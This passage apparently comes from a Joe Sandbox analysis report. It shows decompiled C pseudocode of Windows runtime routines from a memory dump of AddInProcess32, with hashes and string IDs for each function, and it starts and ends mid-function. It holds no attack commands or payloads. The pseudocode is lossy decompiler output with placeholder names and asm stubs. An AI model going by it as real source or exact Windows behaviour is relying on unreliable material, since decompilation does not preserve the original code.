                              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                              							_t48 = 0xc000090b;
                              						}
                              						goto L13;
                              					}
                              				}
                              				_t48 = _t48 + 0xfffffff4;
                              				goto L18;
                              			}
















                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryName
                              • API String ID: 0-215506332
                              • Opcode ID: fef0af5df0d8eff66ee0232935354456610fd68690ca8e1a94c46e510ae02beb
                              • Instruction ID: bf6a243be728a4848f0ed0ae4f04480d444f166d890e6dc8be377ff10f85b759
                              • Opcode Fuzzy Hash: fef0af5df0d8eff66ee0232935354456610fd68690ca8e1a94c46e510ae02beb
                              • Instruction Fuzzy Hash: 7931CEB2D0161ABFEB16DA5CC945E6FBB74FB82B20F054169ED14E7291D6309F00C7A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 33%
                              			E0188D294(void* __ecx, char __edx, void* __eflags) {
                              				signed int _v8;
                              				char _v52;
                              				signed int _v56;
                              				signed int _v60;
                              				intOrPtr _v64;
                              				char* _v68;
                              				intOrPtr _v72;
                              				char _v76;
                              				signed int _v84;
                              				intOrPtr _v88;
                              				char _v92;
                              				intOrPtr _v96;
                              				intOrPtr _v100;
                              				char _v104;
                              				char _v105;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t35;
                              				char _t38;
                              				signed int _t40;
                              				signed int _t44;
                              				signed int _t52;
                              				void* _t53;
                              				void* _t55;
                              				void* _t61;
                              				intOrPtr _t62;
                              				void* _t64;
                              				signed int _t65;
                              				signed int _t66;
                              
                              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                              				_v8 =  *0x194d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                              				_v105 = __edx;
                              				_push( &_v92);
                              				_t52 = 0;
                              				_push(0);
                              				_push(0);
                              				_push( &_v104);
                              				_push(0);
                              				_t59 = __ecx;
                              				_t55 = 2;
                              				if(E01874120(_t55, __ecx) < 0) {
                              					_t35 = 0;
                              					L8:
                              					_pop(_t61);
                              					_pop(_t64);
                              					_pop(_t53);
                              					return E0189B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                              				}
                              				_v96 = _v100;
                              				_t38 = _v92;
                              				if(_t38 != 0) {
                              					_v104 = _t38;
                              					_v100 = _v88;
                              					_t40 = _v84;
                              				} else {
                              					_t40 = 0;
                              				}
                              				_v72 = _t40;
                              				_v68 =  &_v104;
                              				_push( &_v52);
                              				_v76 = 0x18;
                              				_push( &_v76);
                              				_v64 = 0x40;
                              				_v60 = _t52;
                              				_v56 = _t52;
                              				_t44 = E018998D0();
                              				_t62 = _v88;
                              				_t65 = _t44;
                              				if(_t62 != 0) {
                              					asm("lock xadd [edi], eax");
                              					if((_t44 | 0xffffffff) != 0) {
                              						goto L4;
                              					}
                              					_push( *((intOrPtr*)(_t62 + 4)));
                              					E018995D0();
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                              					goto L4;
                              				} else {
                              					L4:
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                              					if(_t65 >= 0) {
                              						_t52 = 1;
                              					} else {
                              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                              						}
                              					}
                              					_t35 = _t52;
                              					goto L8;
                              				}
                              			}


































                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 3e76e6f7e88c8eb24e38cc46a60c9c3b6d917b987d13f7a133d3d3cdef166703
                              • Instruction ID: abb048327a519b1bf522868efce62365dcc55d6f4fd355fe10881df19f63c827
                              • Opcode Fuzzy Hash: 3e76e6f7e88c8eb24e38cc46a60c9c3b6d917b987d13f7a133d3d3cdef166703
                              • Instruction Fuzzy Hash: 2D31AFB15483059FC721EF6CC88096BBBE8EB95758F000A2EF994D3291E634DE04CB93
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E01861B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                              				intOrPtr _v8;
                              				char _v16;
                              				intOrPtr* _t26;
                              				intOrPtr _t29;
                              				void* _t30;
                              				signed int _t31;
                              
                              				_t27 = __ecx;
                              				_t29 = __edx;
                              				_t31 = 0;
                              				_v8 = __edx;
                              				if(__edx == 0) {
                              					L18:
                              					_t30 = 0xc000000d;
                              					goto L12;
                              				} else {
                              					_t26 = _a4;
                              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                              						goto L18;
                              					} else {
                              						E0189BB40(__ecx,  &_v16, __ecx);
                              						_push(_t26);
                              						_push(0);
                              						_push(0);
                              						_push(_t29);
                              						_push( &_v16);
                              						_t30 = E0189A9B0();
                              						if(_t30 >= 0) {
                              							_t19 =  *_t26;
                              							if( *_t26 != 0) {
                              								goto L7;
                              							} else {
                              								 *_a8 =  *_a8 & 0;
                              							}
                              						} else {
                              							if(_t30 != 0xc0000023) {
                              								L9:
                              								_push(_t26);
                              								_push( *_t26);
                              								_push(_t31);
                              								_push(_v8);
                              								_push( &_v16);
                              								_t30 = E0189A9B0();
                              								if(_t30 < 0) {
                              									L12:
                              									if(_t31 != 0) {
                              										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                              									}
                              								} else {
                              									 *_a8 = _t31;
                              								}
                              							} else {
                              								_t19 =  *_t26;
                              								if( *_t26 == 0) {
                              									_t31 = 0;
                              								} else {
                              									L7:
                              									_t31 = L01874620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                              								}
                              								if(_t31 == 0) {
                              									_t30 = 0xc0000017;
                              								} else {
                              									goto L9;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t30;
                              			}










                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: WindowsExcludedProcs
                              • API String ID: 0-3583428290
                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                              • Instruction ID: 7f78933c433e61dbff2c22ca4b6d91053aeedc106d1b102533de1c264623761d
                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                              • Instruction Fuzzy Hash: 6821F836501619EBDB229A5D8884F9FBB6DAFC0B50F054426FA04CB205D630DF01D7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0187F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                              				intOrPtr _t13;
                              				intOrPtr _t14;
                              				signed int _t16;
                              				signed char _t17;
                              				intOrPtr _t19;
                              				intOrPtr _t21;
                              				intOrPtr _t23;
                              				intOrPtr* _t25;
                              
                              				_t25 = _a8;
                              				_t17 = __ecx;
                              				if(_t25 == 0) {
                              					_t19 = 0xc00000f2;
                              					L8:
                              					return _t19;
                              				}
                              				if((__ecx & 0xfffffffe) != 0) {
                              					_t19 = 0xc00000ef;
                              					goto L8;
                              				}
                              				_t19 = 0;
                              				 *_t25 = 0;
                              				_t21 = 0;
                              				_t23 = "Actx ";
                              				if(__edx != 0) {
                              					if(__edx == 0xfffffffc) {
                              						L21:
                              						_t21 = 0x200;
                              						L5:
                              						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                              						 *_t25 = _t13;
                              						L6:
                              						if(_t13 == 0) {
                              							if((_t17 & 0x00000001) != 0) {
                              								 *_t25 = _t23;
                              							}
                              						}
                              						L7:
                              						goto L8;
                              					}
                              					if(__edx == 0xfffffffd) {
                              						 *_t25 = _t23;
                              						_t13 = _t23;
                              						goto L6;
                              					}
                              					_t13 =  *((intOrPtr*)(__edx + 0x10));
                              					 *_t25 = _t13;
                              					L14:
                              					if(_t21 == 0) {
                              						goto L6;
                              					}
                              					goto L5;
                              				}
                              				_t14 = _a4;
                              				if(_t14 != 0) {
                              					_t16 =  *(_t14 + 0x14) & 0x00000007;
                              					if(_t16 <= 1) {
                              						_t21 = 0x1f8;
                              						_t13 = 0;
                              						goto L14;
                              					}
                              					if(_t16 == 2) {
                              						goto L21;
                              					}
                              					if(_t16 != 4) {
                              						_t19 = 0xc00000f0;
                              						goto L7;
                              					}
                              					_t13 = 0;
                              					goto L6;
                              				} else {
                              					_t21 = 0x1f8;
                              					goto L5;
                              				}
                              			}












                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: Actx
                              • API String ID: 0-89312691
                              • Opcode ID: 0ee4e83dd3f8ec792c56f987ba77a9726d7ec7a36600c7c54aff43a06e39af96
                              • Instruction ID: 174c9ec30eee58b3e65f083bb1b8f56e3c19377c85d51ca2d2d6c27705867fba
                              • Opcode Fuzzy Hash: 0ee4e83dd3f8ec792c56f987ba77a9726d7ec7a36600c7c54aff43a06e39af96
                              • Instruction Fuzzy Hash: CB11B2353086868BEB258E1F8891736F695AB867E8F24452AE771CB391DB70CA408740
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E01908DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                              				intOrPtr _t35;
                              				void* _t41;
                              
                              				_t40 = __esi;
                              				_t39 = __edi;
                              				_t38 = __edx;
                              				_t35 = __ecx;
                              				_t34 = __ebx;
                              				_push(0x74);
                              				_push(0x1930d50);
                              				E018AD0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                              					E018E5720(0x65, 0, "Critical error detected %lx\n", _t35);
                              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                              						asm("int3");
                              						 *(_t41 - 4) = 0xfffffffe;
                              					}
                              				}
                              				 *(_t41 - 4) = 1;
                              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                              				 *((intOrPtr*)(_t41 - 0x64)) = E018ADEF0;
                              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                              				_push(_t41 - 0x70);
                              				E018ADEF0(1, _t38);
                              				 *(_t41 - 4) = 0xfffffffe;
                              				return E018AD130(_t34, _t39, _t40);
                              			}






                              Strings
                              • Critical error detected %lx, xrefs: 01908E21
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: Critical error detected %lx
                              • API String ID: 0-802127002
                              • Opcode ID: 5d4cebb08a9be3d45d4ba8b7df3ce5881c56e3ae0c83a59cb392d1aba0f83159
                              • Instruction ID: 1d03dfacce36be038bfb704bf0d221ed92e920f1b067ff9ff443454fcb887d25
                              • Opcode Fuzzy Hash: 5d4cebb08a9be3d45d4ba8b7df3ce5881c56e3ae0c83a59cb392d1aba0f83159
                              • Instruction Fuzzy Hash: FA1175B5E40348DFEB26DFA88905B9DBBB4AB14315F20421EE128AB282C3741A02CF15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E01925BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                              				signed int _t296;
                              				signed char _t298;
                              				signed int _t301;
                              				signed int _t306;
                              				signed int _t310;
                              				signed char _t311;
                              				intOrPtr _t312;
                              				signed int _t313;
                              				void* _t327;
                              				signed int _t328;
                              				intOrPtr _t329;
                              				intOrPtr _t333;
                              				signed char _t334;
                              				signed int _t336;
                              				void* _t339;
                              				signed int _t340;
                              				signed int _t356;
                              				signed int _t362;
                              				short _t367;
                              				short _t368;
                              				short _t373;
                              				signed int _t380;
                              				void* _t382;
                              				short _t385;
                              				signed short _t392;
                              				signed char _t393;
                              				signed int _t395;
                              				signed char _t397;
                              				signed int _t398;
                              				signed short _t402;
                              				void* _t406;
                              				signed int _t412;
                              				signed char _t414;
                              				signed short _t416;
                              				signed int _t421;
                              				signed char _t427;
                              				intOrPtr _t434;
                              				signed char _t435;
                              				signed int _t436;
                              				signed int _t442;
                              				signed int _t446;
                              				signed int _t447;
                              				signed int _t451;
                              				signed int _t453;
                              				signed int _t454;
                              				signed int _t455;
                              				intOrPtr _t456;
                              				intOrPtr* _t457;
                              				short _t458;
                              				signed short _t462;
                              				signed int _t469;
                              				intOrPtr* _t474;
                              				signed int _t475;
                              				signed int _t479;
                              				signed int _t480;
                              				signed int _t481;
                              				short _t485;
                              				signed int _t491;
                              				signed int* _t494;
                              				signed int _t498;
                              				signed int _t505;
                              				intOrPtr _t506;
                              				signed short _t508;
                              				signed int _t511;
                              				void* _t517;
                              				signed int _t519;
                              				signed int _t522;
                              				void* _t523;
                              				signed int _t524;
                              				void* _t528;
                              				signed int _t529;
                              
                              				_push(0xd4);
                              				_push(0x1931178);
                              				E018AD0E8(__ebx, __edi, __esi);
                              				_t494 = __edx;
                              				 *(_t528 - 0xcc) = __edx;
                              				_t511 = __ecx;
                              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                              				 *(_t528 - 0xbc) = __ecx;
                              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                              				_t427 = 0;
                              				 *(_t528 - 0x74) = 0;
                              				 *(_t528 - 0x9c) = 0;
                              				 *(_t528 - 0x84) = 0;
                              				 *(_t528 - 0xac) = 0;
                              				 *(_t528 - 0x88) = 0;
                              				 *(_t528 - 0xa8) = 0;
                              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                              				if( *(_t528 + 0x1c) <= 0x80) {
                              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                              					if(__eflags != 0) {
                              						_t421 = E01924C56(0, __edx, __ecx, __eflags);
                              						__eflags = _t421;
                              						if(_t421 != 0) {
                              							 *((intOrPtr*)(_t528 - 4)) = 0;
                              							E0189D000(0x410);
                              							 *(_t528 - 0x18) = _t529;
                              							 *(_t528 - 0x9c) = _t529;
                              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                              							E01925542(_t528 - 0x9c, _t528 - 0x84);
                              						}
                              					}
                              					_t435 = _t427;
                              					 *(_t528 - 0xd0) = _t435;
                              					_t474 = _t511 + 0x65;
                              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                              					_t511 = 0x18;
                              					while(1) {
                              						 *(_t528 - 0xa0) = _t427;
                              						 *(_t528 - 0xbc) = _t427;
                              						 *(_t528 - 0x80) = _t427;
                              						 *(_t528 - 0x78) = 0x50;
                              						 *(_t528 - 0x79) = _t427;
                              						 *(_t528 - 0x7a) = _t427;
                              						 *(_t528 - 0x8c) = _t427;
                              						 *(_t528 - 0x98) = _t427;
                              						 *(_t528 - 0x90) = _t427;
                              						 *(_t528 - 0xb0) = _t427;
                              						 *(_t528 - 0xb8) = _t427;
                              						_t296 = 1 << _t435;
                              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                              						__eflags = _t436 & _t296;
                              						if((_t436 & _t296) != 0) {
                              							goto L92;
                              						}
                              						__eflags =  *((char*)(_t474 - 1));
                              						if( *((char*)(_t474 - 1)) == 0) {
                              							goto L92;
                              						}
                              						_t301 =  *_t474;
                              						__eflags = _t494[1] - _t301;
                              						if(_t494[1] <= _t301) {
                              							L10:
                              							__eflags =  *(_t474 - 5) & 0x00000040;
                              							if(( *(_t474 - 5) & 0x00000040) == 0) {
                              								L12:
                              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                              									goto L92;
                              								}
                              								_t442 =  *(_t474 - 0x11) & _t494[3];
                              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                              									goto L92;
                              								}
                              								__eflags = _t442 -  *(_t474 - 0x11);
                              								if(_t442 !=  *(_t474 - 0x11)) {
                              									goto L92;
                              								}
                              								L15:
                              								_t306 =  *(_t474 + 1) & 0x000000ff;
                              								 *(_t528 - 0xc0) = _t306;
                              								 *(_t528 - 0xa4) = _t306;
                              								__eflags =  *0x19460e8;
                              								if( *0x19460e8 != 0) {
                              									__eflags = _t306 - 0x40;
                              									if(_t306 < 0x40) {
                              										L20:
                              										asm("lock inc dword [eax]");
                              										_t310 =  *0x19460e8; // 0x0
                              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                              										__eflags = _t311 & 0x00000001;
                              										if((_t311 & 0x00000001) == 0) {
                              											 *(_t528 - 0xa0) = _t311;
                              											_t475 = _t427;
                              											 *(_t528 - 0x74) = _t427;
                              											__eflags = _t475;
                              											if(_t475 != 0) {
                              												L91:
                              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                              												goto L92;
                              											}
                              											asm("sbb edi, edi");
                              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                              											_t511 = _t498;
                              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                              											__eflags =  *(_t312 - 5) & 1;
                              											if(( *(_t312 - 5) & 1) != 0) {
                              												_push(_t528 - 0x98);
                              												_push(0x4c);
                              												_push(_t528 - 0x70);
                              												_push(1);
                              												_push(0xfffffffa);
                              												_t412 = E01899710();
                              												_t475 = _t427;
                              												__eflags = _t412;
                              												if(_t412 >= 0) {
                              													_t414 =  *(_t528 - 0x98) - 8;
                              													 *(_t528 - 0x98) = _t414;
                              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                              													 *(_t528 - 0x8c) = _t416;
                              													 *(_t528 - 0x79) = 1;
                              													_t511 = (_t416 & 0x0000ffff) + _t498;
                              													__eflags = _t511;
                              												}
                              											}
                              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                              											__eflags = _t446 & 0x00000004;
                              											if((_t446 & 0x00000004) != 0) {
                              												__eflags =  *(_t528 - 0x9c);
                              												if( *(_t528 - 0x9c) != 0) {
                              													 *(_t528 - 0x7a) = 1;
                              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                              													__eflags = _t511;
                              												}
                              											}
                              											_t313 = 2;
                              											_t447 = _t446 & _t313;
                              											__eflags = _t447;
                              											 *(_t528 - 0xd4) = _t447;
                              											if(_t447 != 0) {
                              												_t406 = 0x10;
                              												_t511 = _t511 + _t406;
                              												__eflags = _t511;
                              											}
                              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                              											 *(_t528 - 0x88) = _t427;
                              											__eflags =  *(_t528 + 0x1c);
                              											if( *(_t528 + 0x1c) <= 0) {
                              												L45:
                              												__eflags =  *(_t528 - 0xb0);
                              												if( *(_t528 - 0xb0) != 0) {
                              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                              													__eflags = _t511;
                              												}
                              												__eflags = _t475;
                              												if(_t475 != 0) {
                              													asm("lock dec dword [ecx+edx*8+0x4]");
                              													goto L100;
                              												} else {
                              													_t494[3] = _t511;
                              													_t451 =  *(_t528 - 0xa0);
                              													_t427 = E01896DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                              													 *(_t528 - 0x88) = _t427;
                              													__eflags = _t427;
                              													if(_t427 == 0) {
                              														__eflags = _t511 - 0xfff8;
                              														if(_t511 <= 0xfff8) {
                              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                              															asm("sbb ecx, ecx");
                              															__eflags = (_t451 & 0x000000e2) + 8;
                              														}
                              														asm("lock dec dword [eax+edx*8+0x4]");
                              														L100:
                              														goto L101;
                              													}
                              													_t453 =  *(_t528 - 0xa0);
                              													 *_t494 = _t453;
                              													_t494[1] = _t427;
                              													_t494[2] =  *(_t528 - 0xbc);
                              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                              													 *_t427 =  *(_t453 + 0x24) | _t511;
                              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													__eflags =  *(_t528 + 0x14);
                              													if( *(_t528 + 0x14) == 0) {
                              														__eflags =  *[fs:0x18] + 0xf50;
                              													}
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													asm("movsd");
                              													__eflags =  *(_t528 + 0x18);
                              													if( *(_t528 + 0x18) == 0) {
                              														_t454 =  *(_t528 - 0x80);
                              														_t479 =  *(_t528 - 0x78);
                              														_t327 = 1;
                              														__eflags = 1;
                              													} else {
                              														_t146 = _t427 + 0x50; // 0x50
                              														_t454 = _t146;
                              														 *(_t528 - 0x80) = _t454;
                              														_t382 = 0x18;
                              														 *_t454 = _t382;
                              														 *((short*)(_t454 + 2)) = 1;
                              														_t385 = 0x10;
                              														 *((short*)(_t454 + 6)) = _t385;
                              														 *(_t454 + 4) = 0;
                              														asm("movsd");
                              														asm("movsd");
                              														asm("movsd");
                              														asm("movsd");
                              														_t327 = 1;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 = 0x68;
                              														 *(_t528 - 0x78) = _t479;
                              													}
                              													__eflags =  *(_t528 - 0x79) - _t327;
                              													if( *(_t528 - 0x79) == _t327) {
                              														_t524 = _t479 + _t427;
                              														_t508 =  *(_t528 - 0x8c);
                              														 *_t524 = _t508;
                              														_t373 = 2;
                              														 *((short*)(_t524 + 2)) = _t373;
                              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                              														 *((short*)(_t524 + 4)) = 0;
                              														_t167 = _t524 + 8; // 0x8
                              														E0189F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                              														_t529 = _t529 + 0xc;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                              														 *(_t528 - 0x78) = _t479;
                              														_t380 =  *(_t528 - 0x80);
                              														__eflags = _t380;
                              														if(_t380 != 0) {
                              															_t173 = _t380 + 4;
                              															 *_t173 =  *(_t380 + 4) | 1;
                              															__eflags =  *_t173;
                              														}
                              														_t454 = _t524;
                              														 *(_t528 - 0x80) = _t454;
                              														_t327 = 1;
                              														__eflags = 1;
                              													}
                              													__eflags =  *(_t528 - 0xd4);
                              													if( *(_t528 - 0xd4) == 0) {
                              														_t505 =  *(_t528 - 0x80);
                              													} else {
                              														_t505 = _t479 + _t427;
                              														_t523 = 0x10;
                              														 *_t505 = _t523;
                              														_t367 = 3;
                              														 *((short*)(_t505 + 2)) = _t367;
                              														_t368 = 4;
                              														 *((short*)(_t505 + 6)) = _t368;
                              														 *(_t505 + 4) = 0;
                              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                              														_t327 = 1;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 = _t479 + _t523;
                              														 *(_t528 - 0x78) = _t479;
                              														__eflags = _t454;
                              														if(_t454 != 0) {
                              															_t186 = _t454 + 4;
                              															 *_t186 =  *(_t454 + 4) | 1;
                              															__eflags =  *_t186;
                              														}
                              														 *(_t528 - 0x80) = _t505;
                              													}
                              													__eflags =  *(_t528 - 0x7a) - _t327;
                              													if( *(_t528 - 0x7a) == _t327) {
                              														 *(_t528 - 0xd4) = _t479 + _t427;
                              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                              														E0189F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                              														_t529 = _t529 + 0xc;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 =  *(_t528 - 0x78) + _t522;
                              														 *(_t528 - 0x78) = _t479;
                              														__eflags = _t505;
                              														if(_t505 != 0) {
                              															_t199 = _t505 + 4;
                              															 *_t199 =  *(_t505 + 4) | 1;
                              															__eflags =  *_t199;
                              														}
                              														_t505 =  *(_t528 - 0xd4);
                              														 *(_t528 - 0x80) = _t505;
                              													}
                              													__eflags =  *(_t528 - 0xa8);
                              													if( *(_t528 - 0xa8) != 0) {
                              														_t356 = _t479 + _t427;
                              														 *(_t528 - 0xd4) = _t356;
                              														_t462 =  *(_t528 - 0xac);
                              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                              														_t485 = 0xc;
                              														 *((short*)(_t356 + 2)) = _t485;
                              														 *(_t356 + 6) = _t462;
                              														 *((short*)(_t356 + 4)) = 0;
                              														_t211 = _t356 + 8; // 0x9
                              														E0189F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                              														E0189FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                              														_t529 = _t529 + 0x18;
                              														_t427 =  *(_t528 - 0x88);
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t505 =  *(_t528 - 0xd4);
                              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                              														 *(_t528 - 0x78) = _t479;
                              														_t362 =  *(_t528 - 0x80);
                              														__eflags = _t362;
                              														if(_t362 != 0) {
                              															_t222 = _t362 + 4;
                              															 *_t222 =  *(_t362 + 4) | 1;
                              															__eflags =  *_t222;
                              														}
                              													}
                              													__eflags =  *(_t528 - 0xb0);
                              													if( *(_t528 - 0xb0) != 0) {
                              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                              														_t458 = 0xb;
                              														 *((short*)(_t479 + _t427 + 2)) = _t458;
                              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                              														 *((short*)(_t427 + 4 + _t479)) = 0;
                              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                              														E0189FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                              														_t529 = _t529 + 0xc;
                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                              														 *(_t528 - 0x78) = _t479;
                              														__eflags = _t505;
                              														if(_t505 != 0) {
                              															_t241 = _t505 + 4;
                              															 *_t241 =  *(_t505 + 4) | 1;
                              															__eflags =  *_t241;
                              														}
                              													}
                              													_t328 =  *(_t528 + 0x1c);
                              													__eflags = _t328;
                              													if(_t328 == 0) {
                              														L87:
                              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
